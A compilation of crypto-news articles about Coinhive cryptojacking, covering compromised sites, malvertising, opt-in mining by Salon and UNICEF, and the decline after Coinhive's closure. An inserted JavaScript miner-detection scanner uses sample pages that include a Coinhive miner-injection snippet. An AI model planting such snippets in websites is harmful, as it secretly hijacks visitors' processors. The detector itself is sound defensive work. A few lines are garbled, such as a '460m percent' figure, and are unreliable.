
Crypto Mining Malware Has Plummeted Since Coinhive Closure


Along with crypto prices, mining malware has also tanked
recently, but not because of the bear market. According to new research, the
chances of your browser being hijacked are far lower now that one major crypto
scourge has gone offline.

Cyber security firm Malwarebytes has revealed that crypto
mining attacks have plummeted by 79 percent compared to the same time a year
ago. The report
added that the primary reason for the decline was the closure of Coinhive last

“Marked by the popular drive-by mining company CoinHive shutting down operations in early March, consumer cryptomining seems to have gone the way of the dodo. Detections of consumer-focused Bitcoin miners have dropped significantly over the last year and even from last quarter,” it added.

Coinhive allowed webmasters to install a script that would
harness the computing resources of anyone viewing the website, often without
their knowledge. This would enable them to make a little extra revenue by mining
Monero on the sly. As Coinhive grew, antivirus companies started blocking
the scripts, which became hugely popular in 2017 and 2018.

Since then, however, Malwarebytes has said that numbers have
fallen dramatically: “We went from tens of millions of blocks to an
estimated two million per day,” the firm told PC Mag. Coinhive announced
its demise in February this year, citing the ongoing bear market and increased
difficulties in mining Monero due to the latest XMR hard fork. Similar research
suggests that the profitability of Monero mining has fallen significantly along
with its price. At the time of writing XMR was trading at $62, a long way down
from its peak of almost $500.

A number of similar scripts have since appeared that emulate
Coinhive. Instead of targeting compromised websites, new versions such as
CoinIMP and CryptoLoot are using torrent portals or file hosting services. In
February a fake version of Metamask was found lurking on the Google Play Store.
According to security firm Check Point, Coinhive scripts could be revived if
crypto prices skyrocket again:

“Despite its closure, the Coinhive JavaScript code is still in place on many websites. No mining is taking place, but if the value of Monero increases significantly, it is possible that Coinhive may come back to life,”

Ledger Detects Desktop Malware

In a related story, crypto wallet provider Ledger has detected
malware that targets its desktop application. The firm warned users that the
malware replaces the genuine software with a malicious version that asks
users to enter their 24 word passphrase after a bogus update.

At the time only Windows machines appeared to be infected
and the malware does not mine or steal cryptocurrency. It attempts to use
social engineering to lure users into giving up their passphrase.

The post Crypto Mining Malware Has Plummeted Since Coinhive Closure appeared first on Ethereum World News.


Monero (XMR) Coinhive Miner Rakes In Over $120,000 A Month

Many individuals fall under the false impression that crypto mining operations are solely operated by large corporations with data centers that can be likened to a mansion. However, this is far from the case, as there are methods of mining that can be used to garner cryptocurrencies, like Monero, through any old computer system.


One such method is through Coinhive, which is a JavaScript-based miner that is often situated on sites across the web. For those who are unaware, Coinhive, which was released in 2017, is a Monero-focused mining script that is specifically targeted at websites looking to make money without running advertisements. Although there has been a dramatic decrease in the prices of cryptocurrencies, Monero included, the script is still used en masse today.

According to a report from Germany’s RWTH Aachen University, which was relayed by The Next Web, Coinhive-based miners make up a hefty 1.18% of the total hashing power of the Monero blockchain. While 1% may not sound like anything extraordinary, it is surprising considering that the crypto mining industry is backed by billions of dollars. Moreover, Monero miners account for 75% of all browser-based crypto mining operations.

The academics further noted, after an in-depth analysis of the Monero network, that Coinhive could generate upwards of 300 XMR each week. This translates to approximately $29,000 a week, $120,000 a month, and $1.4 million each year at August 17th prices (1 XMR = $96). The report elaborated, noting:

“If we sum up the block rewards of the actually mined blocks over the observation period of [four] weeks, we find that Coinhive [sic] earned 1,271 XMR.”

While website owners utilizing the script have been raking in XMR, the developers behind CoinHive also integrated a function where they get 30% of all mined cryptocurrencies. As such, it is speculated that the developers behind the project have garnered hundreds of thousands of dollars in XMR since its release.

Hackers And Coinhive’s ‘Short Link’ Feature

Although Coinhive’s developers originally created the script with good intent, it quickly became a way for hackers acting with malicious intent to fill their own cryptocurrency wallets. These hackers often secretly integrate Coinhive code onto websites to infect thousands of computers, forcing the devices of unsuspecting victims to mine for a hacker’s personal gain. This is an attack vector of choice because setting up an XMR Coinhive miner is relatively easy and transactions are kept confidential on the Monero blockchain.

According to the aforementioned report, CoinHive can operate using a so-called ‘short link’ system, where a user is required to unknowingly or knowingly submit a varied amount of hashes to the Monero network to reach a specific website.

Upon analysis of the nearly two million active short links, academics found that a majority of these short links are directed to shady sites, indicating how widespread the cryptojacking dilemma may have become. Additionally, the majority of the XMR garnered through the aforementioned two million short links are reportedly directed to 10 individuals.

To stop your computer from being cryptojacked, whether through short links, malicious downloads or infected websites, security researcher Troy Mursch recommends the minerBlock browser extension, which uses a JavaScript detector to stave off all cryptojacking attempts.



The rise in Cryptojacking Attacks Linked to Unsecured Mobile Apps

One company believes that unsecured mobile apps are to blame for the surge in cryptocurrency mining attacks aka cryptojacking. Other internet security experts also report that unless drastic measures are taken, the attacks will only become more severe.

Coinhive Leads the Way in Cryptojacking Attacks

Amidst the price saga of 2018, the rise of cryptojacking has been another highlight of the burgeoning cryptocurrency industry. There have been numerous cryptocurrency mining hacks reported in the first half of the year. The second quarter of 2018 has seen a dramatic rise in these attacks as cybercriminals have developed even more sophisticated mining exploits.

According to California-based cybersecurity firm, Proofpoint Inc., there has been a 460m percent surge in Coinhive-based cryptojacking attacks. The firm also reveals that a large percentage of these attacks are carried out via mobile phone apps. The apps mine cryptocurrency, usually Monero – a privacy-centric coin, in the background while the phone is in operation.

Earlier in 2018, the company announced that there were 19 smartphone apps infected with Coinhive malware. These apps have since been removed from the Google Play Store. However, Proofpoint reports that Coinhive activity seems to be increasing, even experiencing a massive spike in May.

Commenting on the situation, Sherrod DeGrippo of Proofpoint said:

Cybercriminals are following the money and right now Coinhive is a road to success. Coinhive traffic has also likely increased recently because the damage it inflicts isn’t immediately apparent, but it is profitable. Ransomware, for example, is extremely disruptive and banking Trojans are much more difficult to monetize.

According to Mike Pound, a Professor at the University of Nottingham specializing in computing technology, the spate of cryptojacking is not unexpected.

It doesn’t surprise me that malware creators are moving away from simple in-browser scripts by burying mining code in apps and other banking malware. These kinds of attacks are only going to become more prevalent when this script is bundled into other malware as an add-on. It’s an efficient route to profit for criminals.

Cryptojacking: A Clear and Present Danger to the Cryptocurrency Industry

Both Google and Apple have had to remove malware-infected apps from their respective online stores. With the increase in the prices of cryptos last year, cybercriminals seem ever more desperate to acquire coins by any means necessary. Tech behemoths like Microsoft and Tesla have also had their cloud platforms infected with cryptojacking malware.

Most of the cryptocurrency mining hacks are centered on mining Monero. In March 2018, researchers discovered more than 50,000 websites infected with malicious mining scripts. However, based on Proofpoint’s findings, it seems like the attackers have upped their game significantly.

It is incumbent on internet users to be safety conscious while online. Many browser stores have plugins and add-ons that can protect computers from cryptojacking attacks. People can also endeavor to download apps only from reputable online stores.

Do you agree with Proofpoint’s analysis that shows mobile phone apps are to blame for the ubiquity of cryptojacking attacks? What steps do you think people can take to prevent falling victim to crypto mining hacks? Keep the conversation going in the comment section below.


'Cryptojacking' Software Attack Hits Hundreds of Websites

Hackers have injected hundreds of websites running the Drupal content management system with malicious software used to mine the cryptocurrency monero.

This latest incident was uncovered by Troy Mursch, the security researcher behind the website Bad Packets Report. He wrote Saturday that more than 300 sites had been compromised by hackers who installed the browser mining software Coinhive, which mines the cryptocurrency monero, by exploiting a vulnerability in an outdated version of the Drupal content management system (CMS).

“Cryptojacking,” as similar attacks are called, has become a common problem in recent months. Whereas hackers used to favor ransom attacks – in which they would scramble victims’ data and demand ransoms in bitcoin or another cryptocurrency in order to decrypt it – they now increasingly infect websites with software that harnesses visitors’ computers to mine cryptocurrency on the attackers’ behalf.

Mursch told CoinDesk that while cryptojacking is not as overt as ransomware, it “continues to be a problem – especially for website operators.”

He explained:

“This is because Coinhive and other cryptojacking services (malware) are simply done with JavaScript. Every modern browser and device can run JavaScript, so as such, everybody can mine cryptocurrency and unfortunately Coinhive has been used and abused time and time again. [In] this particular case, Drupal users need to update [as soon as possible].”

Affected sites include the San Diego Zoo, the National Labor Relations Board, the City of Marion, Ohio, the University of Aleppo, the Ringling College of Art and Design and the government of Chihuahua, Mexico. A full list of affected sites is available on this spreadsheet.

Visitors to affected websites may not even notice that their computers are running the cryptographic functions used to generate monero for hackers. The attacks slow users’ computers down, however, and can cause wear and tear on computers’ processors.

Not all Coinhive users are malicious, however. Salon, a news outlet, and UNICEF use the software to raise funds, but only run it with visitors’ permission.


The leader in blockchain news, CoinDesk is a media outlet that strives for the highest journalistic standards and abides by a strict set of editorial policies. CoinDesk is an independent operating subsidiary of Digital Currency Group, which invests in cryptocurrencies and blockchain startups.


UNICEF Is Mining Crypto to Raise Funds for Children

The United Nations Children’s Fund (UNICEF) is seeking to harness supporters’ computers to raise donations via cryptocurrency mining.

To that end, the organization has launched “The Hope Page” – a website that mines cryptocurrency with the help of visitors’ computer processing power. The non-profit said in a statement that the site will “allow Australians to provide help and hope to vulnerable children by simply opening the page while they are online”, ITnews Australia stated.

According to the website, Hope Page allows visitors to select how much processing power they want to contribute to the mining process. The longer they stay on the site, the more cryptocurrency is mined.

UNICEF states:

“Mining is perfectly safe for your computer. If you’re ever worried about power consumption, turn down the amount of processing power you’re donating.”

Any cryptocurrency mined is turned into fiat currency and donated to UNICEF Australia to be used to help vulnerable children worldwide with life-saving supplies such as safe drinking water, food and vaccines.

The browser miner is powered by an opt-in version of the Coinhive API, AuthedMine, and mines the monero cryptocurrency.

According to Jennifer Tierney, director of fundraising and communications for UNICEF Australia, the organization had been seeking to use emerging technologies to raise awareness about current humanitarian crises and collect donations to support affected children.

At press time, over 1,600 people were seen donating computer power to aid the organization.


Researcher Finds Nearly 50,000 Websites Running Cryptocurrency Mining Malware

Troy Mursch from Bad Packets Report recently conducted an investigation, in which he found that the ongoing cryptojacking trend has infected nearly 50,000 websites. According to his report, 48,953 websites are running cryptocurrency mining malware.

Cryptocurrency mining malware essentially consists of a few lines of JavaScript code that allow a website’s admin to use its visitors’ computer resources to mine privacy-centric cryptocurrencies, the most popular one being Monero (XMR).

Mursch’s research was made using source-code search engine PublicWWW. Using it, he scanned the web for pages running cryptocurrency mining malware. Out of the 48,953 affected websites he found, 7,368 are powered by WordPress.

The researcher further revealed that Coinhive is the most widespread mining script out there. It accounts for nearly 40,000 infected websites, which roughly translates to 81 percent of all cases. Back in November, Mursch’s research found 30,000 websites running Coinhive’s script.

The remaining 19 percent of websites were found to be running Coinhive alternatives, like Crypto-Loot, CoinImp, Minr, and deepMiner. The report reads:

“The four Coinhive clones discussed were found on a total of 9,028 websites. CoinImp had the largest market share at roughly 45% while Minr had the smallest at nearly 8%. Crypto-Loot and deepMiner shared the remaining portions at nearly 23% a piece.”
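The kind of source-code match such a scan relies on, as an added example (not Mursch's queries and not code from any of the articles). The hosts `coinhive.com` and `authedmine.com` belong to the services themselves; matching the clone family names against the script URL is an assumption, and the sample pages and `SITE_KEY_PLACEHOLDER` are constructed.

```javascript
// Added example: static scan of page HTML for browser-miner script includes.
// Only <script> tags are inspected, so an article that merely mentions a miner is not flagged.
const HOST_RULES = [
  { family: "Coinhive", optIn: false, host: /(^|\.)coinhive\.com$/i },
  { family: "AuthedMine", optIn: true, host: /(^|\.)authedmine\.com$/i }, // opt-in Coinhive variant
];
// Assumption: a clone's script URL contains its family name (names taken from the article).
const KEYWORD_RULES = [
  { family: "Crypto-Loot", re: /crypto-?loot/i },
  { family: "CoinImp", re: /coinimp/i },
  { family: "Minr", re: /\bminr\b/i },
  { family: "deepMiner", re: /deepminer/i },
];
const API_CALL = /\bnew\s+CoinHive\.(Anonymous|User)\s*\(/; // Coinhive JS API constructors
const SCRIPT_TAG = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
const SRC_ATTR = /(?:^|\s)src\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;

function scanHtml(html) {
  const findings = [];
  let apiCall = false;
  let hostMatched = false;
  for (const [, attrs, body] of html.matchAll(SCRIPT_TAG)) {
    const m = SRC_ATTR.exec(attrs);
    if (m) {
      const src = m[1] ?? m[2] ?? m[3];
      let url = null;
      // The base URL resolves relative and protocol-relative ("//host/...") sources.
      try { url = new URL(src, "https://page.invalid/"); } catch { url = null; }
      if (url) {
        for (const rule of HOST_RULES) {
          if (rule.host.test(url.hostname)) {
            findings.push({ family: rule.family, optIn: rule.optIn, evidence: src });
            hostMatched = true;
          }
        }
        const haystack = url.hostname + url.pathname;
        for (const rule of KEYWORD_RULES) {
          if (rule.re.test(haystack)) {
            findings.push({ family: rule.family, optIn: false, evidence: src });
          }
        }
      }
    }
    if (API_CALL.test(body)) apiCall = true;
  }
  // A miner started from a self-hosted or proxied copy of the library has no known host.
  if (apiCall && !hostMatched) {
    findings.push({
      family: "Coinhive API (unrecognised library host)",
      optIn: false,
      evidence: "inline CoinHive constructor call",
    });
  }
  return findings;
}

function verdict(html) {
  const findings = scanHtml(html);
  if (findings.length === 0) return "clean";
  return findings.every((f) => f.optIn) ? "opt-in-miner" : "miner";
}

// Constructed sample pages (not taken from any real site).
const SAMPLES = {
  injected: `<head><script src="//coinhive.com/lib/coinhive.min.js"></script>
    <script>var miner = new CoinHive.Anonymous("SITE_KEY_PLACEHOLDER"); miner.start();</script></head>`,
  optIn: `<script src="https://authedmine.com/lib/authedmine.min.js"></script>
    <script>new CoinHive.Anonymous("SITE_KEY_PLACEHOLDER", { throttle: 0.5 }).start();</script>`,
  selfHosted: `<script src="/assets/lib.min.js"></script>
    <script>new CoinHive.Anonymous("SITE_KEY_PLACEHOLDER").start();</script>`,
  clone: `<script src="https://cdn.example/coinimp/miner.min.js"></script>`,
  article: `<p>Coinhive closed in March; coinhive.com is offline.</p><script src="/js/site.js"></script>`,
};

for (const [name, html] of Object.entries(SAMPLES)) {
  console.log(name, verdict(html), scanHtml(html).map((f) => f.family));
}
```

A static match like this misses miners that are obfuscated or loaded dynamically at run time, so it complements browser-side blocking and does not replace it.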

The researcher published a document on PasteBin, detailing all WordPress websites infected with the cryptocurrency mining malware. The document notes that some have already removed the malware, although most are still likely to mine with users’ computers. “Browse at your own risk,” the document reads.

Per the researcher, users looking to protect themselves from the ongoing cryptojacking trend should install the minerBlock extension for Chrome and Firefox. Browsers like Opera and Brave already have built-in tools that block mining attempts as well.

The ongoing cryptojacking trend has been making headlines for affecting high-profile victims, including government websites last month. As reported, Tesla was also hit with a cryptocurrency mining malware attack, as hackers used its cloud to mine.

As covered by Ethereum World News, hackers aren’t just using people’s CPUs to mine Monero. They are now stuffing Monero ransom notes inside distributed denial of service (DDoS) attacks, to get victims to pay them to stop.


Salon Offers Readers Choice Between Ads and Mining Monero

Digital media publication Salon is offering its visitors an alternative to traditional online ads: allowing the site to use their computer processing power to mine cryptocurrency.

In order to provide free content, Salon primarily depended on advertisements to run its servers, the company explained in a blog post published on Monday. However, digital ads are insufficient to fully pay for most media outlets – the site noted that ad revenue fell $40 billion from 1999 to 2010 – and Salon, in particular, has decided to offer users a new option to pay for content.

Salon will profit by selling “a small percentage of [users’] spare processing power to contribute to the advancement of technological discovery, evolution and innovation,” the company explained. While they don’t come out and say it directly, the site, according to The Verge, is using the open-source CoinHive software in order to mine the cryptocurrency monero.

“The demand for computing power across many different industries and applications is potentially very high. We intend to use a small percentage of your spare processing power to contribute to the advancement of technological discovery, evolution and innovation. For our beta program, we’ll start by applying your processing power to help support the evolution and growth of blockchain technology and cryptocurrencies,” the company wrote on the blog.

In contrast with the malware approach, which seeks to use as much of a computer’s processing power as possible in order to maximize the return drawn from mining, Salon says it will eschew that by actively adjusting how much processing power is being used by their crypto-miner, explaining:

“We automatically detect your current processing usage and assign a portion of what you are not using to this process. Should you begin a process that requires more of your computer’s resources, we automatically reduce the amount we are using for calculations.”

Coinhive is one of the most-used browser-based mining programs, as previously reported by CoinDesk. The service offers a JavaScript-based application which website owners can embed on their sites.

However, the developers reportedly did not expect malicious actors to take advantage of the platform as much as they have. The developers preferred that websites are up-front about their use of the miner, according to a story from Motherboard.


The leader in blockchain news, CoinDesk is an independent media outlet that strives for the highest journalistic standards and abides by a strict set of editorial policies. Have breaking news or a story tip to send to our journalists? Contact us at


UK Government Websites Hit By Cryptocurrency Mining Malware

U.K. government websites and more than 4,000 others worldwide have reportedly been exploited by malware that harnesses visitors’ computers to mine cryptocurrency.

According to the BBC, the incident was first revealed after British security researcher Scott Helme raised the alarm that users browsing the website of the U.K. Information Commissioner’s Office (ICO) are affected by the malware, dubbed Coinhive, which illicitly mines the anonymous cryptocurrency Monero.

The ICO subsequently closed its website when the issue was revealed, the report indicates. At press time, the site was still down, citing “maintenance.”

The BBC said the malware spread after having compromised a website plug-in service named Browsealoud, which is used to help blind or partially sighted users access website content.

According to the report, the maker of the plug-in, Texthelp, confirmed that its product was breached for four hours by the mining malware. Helme said the malware had now been disabled.

In addition to the ICO website, the report said other British sites are also affected, including the Student Loans Company and Barnsley Hospital, as well as thousands of others worldwide.

According to another report from an Australian news source, several government sites in Queensland, as well as the Victorian Parliament, also appeared to have been affected.

According to a November 2017 report, Coinhive has become the sixth most common form of malware. It has previously been discovered in Google ads, the Ultimate Fighting Championship website and TV network Showtime, among many others.


Google's DoubleClick Ads Used to Distribute Crypto Mining Malware

Security firm TrendMicro stated in a new report that Google’s DoubleClick ad services were used to distribute cryptocurrency mining malware to a number of users in Europe and Asia.

On its Security and Intelligence Blog, the company outlined how CoinHive – a JavaScript program that works in the background of a website and uses a computer’s processing power to mine monero – was distributed by attackers who appropriated Google’s DoubleClick. Significantly, miners like CoinHive operate without a user’s consent or knowledge.

Google’s DoubleClick ad services are also used by YouTube, the world’s most popular video sharing service, and the miner impacted a number of users on the site, according to ArsTechnica.

A “separate web miner that connects to a private pool” was also involved in the scheme, according to TrendMicro’s report.

The “malvertisement” incorporated two different web miner scripts in addition to the actual advertisement, according to the report.

It continued:

“The affected webpage will show the legitimate advertisement while the two web miners covertly perform their task. We speculate that the attackers’ use of these advertisements on legitimate websites is a ploy to target a larger number of users, in comparison to only that of compromised devices. The traffic involving the abovementioned cryptocurrency miners has since decreased after January 24”.

As much as 80 percent of an affected computer’s processing power can be taken over when exposed, reducing the machine’s performance, according to the report.

Clandestine cryptocurrency mining has been on the rise in recent months, as previously reported. Companies such as oil pipeline giant Transneft have seen their systems affected by the malware, and a report from November suggested that CoinHive has become one of the more common pieces of malware in circulation today.


CoinHive Cryptocurrency Miner Is 6th Most Common Malware, Says Report

Cyber-security solutions provider Check Point Software has said that the threat from cryptocurrency mining malware is rapidly growing.

According to the company’s latest Global Threat Impact Index report, the CoinHive variant became the sixth most-used malware in October. CoinHive – a JavaScript program that lurks unseen on websites – works by tapping the processing power of visitors’ computers to mine monero.

Maya Horowitz, threat intelligence group manager at Check Point, said in a press release that the emergence of mining malware like CoinHive highlights the “need for advanced threat prevention technologies” to curb such practices and protect networks from cyber-criminals.

Horowitz added:

“Crypto mining is a new, silent, yet significant actor in the threat landscape, allowing threat actors to make significant revenues while victims’ endpoints and networks suffer from latency and decreased performance.”

According to the report, malware variant RoughTed (adware) topped the index, followed by Locky (ransomware) and Seamless (traffic redirection).

Recently, internet domain provider Cloudflare suspended websites that ran hidden cryptocurrency miners, including that of the operator of torrent site ProxyBunker. This site was said to be running the Coinhive miner for four days prior to the suspension.
